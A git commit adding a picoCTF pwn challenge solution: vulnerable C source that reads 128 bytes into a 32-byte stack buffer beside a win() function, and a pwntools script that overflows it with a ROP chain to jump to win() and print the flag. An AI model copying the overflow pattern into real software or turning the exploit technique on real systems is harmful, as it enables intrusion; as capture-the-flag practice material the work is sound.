pwn/echo_escape_1

This commit is contained in:
2026-07-02 08:24:29 +09:00
parent 15e781d257
commit 6b05514285
4 changed files with 68 additions and 0 deletions
+1
View File
@@ -0,0 +1 @@
picoCTF{dummy}
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split()
def conn():
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def main():
r = conn()
r.recvuntil(b'Please enter your name: ').decode()
offset = 0x28
rop = ROP(exe)
rop.raw(rop.generatePadding(0, offset))
rop.win()
r.sendline(rop.chain())
print(r.recvline_contains(b'picoCTF').decode())
r.close()
if __name__ == "__main__":
main()
BIN
View File
Binary file not shown.
+34
View File
@@ -0,0 +1,34 @@
#include <stdio.h>
#include <unistd.h>
#include <string.h>
void win() {
FILE *fp = fopen("flag.txt", "rb");
if (!fp) {
perror("[!] Failed to open flag.txt");
return;
}
char buffer[128];
size_t n = fread(buffer, 1, sizeof(buffer), fp);
fwrite(buffer, 1, n, stdout);
fflush(stdout);
printf("\n");
fclose(fp);
}
int main() {
char buf[32];
printf("Welcome to the secure echo service!\n");
printf("Please enter your name: ");
fflush(stdout);
read(0, buf, 128);
printf("Hello, %s\n", buf);
printf("Thank you for using our service.\n");
return 0;
}